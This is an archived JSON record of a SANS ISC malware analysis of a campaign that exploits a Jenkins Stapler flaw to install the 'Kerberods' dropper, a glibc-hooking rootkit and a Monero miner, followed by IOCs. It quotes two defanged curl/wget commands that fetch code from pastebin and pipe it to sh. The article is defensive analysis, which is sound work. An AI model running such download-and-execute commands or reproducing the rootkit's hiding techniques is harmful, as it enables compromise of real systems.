{
	"id": "5bca75f8-d965-409a-ad3e-fbd61125bf1e",
	"created_at": "2026-04-06T00:19:05.69763Z",
	"updated_at": "2026-04-10T03:20:22.689412Z",
	"deleted_at": null,
	"sha1_hash": "ea884579ea655fbf0fbf7484c51ddb8aeb944e46",
	"title": "Vulnerable Apache Jenkins exploited in the wild - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1319166,
	"plain_text": "Vulnerable Apache Jenkins exploited in the wild - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:27:10 UTC\r\nAn ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.\r\nThe exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects the Stapler web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.\r\nLooking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published in early March this year.\r\nAfter analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.\r\nhttps://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916\r\nPage 1 of 6\n\nVulnerability Exploitation\r\nIn the picture below, you can see the exploitation occurring. Notice that there is base64-encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:\r\n(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh\r\nThe content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:\r\n(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\\r//'|sh\r\nThe content of the ‘D8E71JBJ’ paste is also no longer available, but it was the shell script shown in the following images.\r\nThe Dropper\r\nThe dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.\r\nAfter analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is open source software and there are many ways UPX can be modified to make it hard to unpack the file using the regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different ways to fix ELF headers in order to unpack files.\r\nFortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, reverting it to UPX in different parts of the binary, it was possible to unpack the binary with the regular version of UPX.\r\nThe Glibc hooks\r\nThe other interesting part is the way ‘Kerberods’ acts to persist and hide itself if it has root privileges on the machine.\r\nIf that is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify their behavior. In other words, it acts like a rootkit.\r\nIn the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to prevent anyone (including root) from opening the binary ‘khugepageds’, which is the cryptominer, ‘ld.so.preload’, which is the file that loads the malicious library, and the library ‘libpamcd.so’ itself.\r\nAnother hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.\r\nIndicators of Compromise (IOCs)\r\nFilesystem\r\n74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8\r\nbab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f\r\n43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2\r\nNetwork\r\nSYSTEMTEN[.]ORG:51640\r\n--\r\nRenato Marinho\r\nMorphus Labs | LinkedIn | Twitter\r\nSource: https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916"
	],
	"report_names": [
		"24916"
	],
	"threat_actors": [],
	"ts_created_at": 1775434745,
	"ts_updated_at": 1775791222,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.pdf",
		"text": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.txt",
		"img": "https://archive.orkl.eu/ea884579ea655fbf0fbf7484c51ddb8aeb944e46.jpg"
	}
}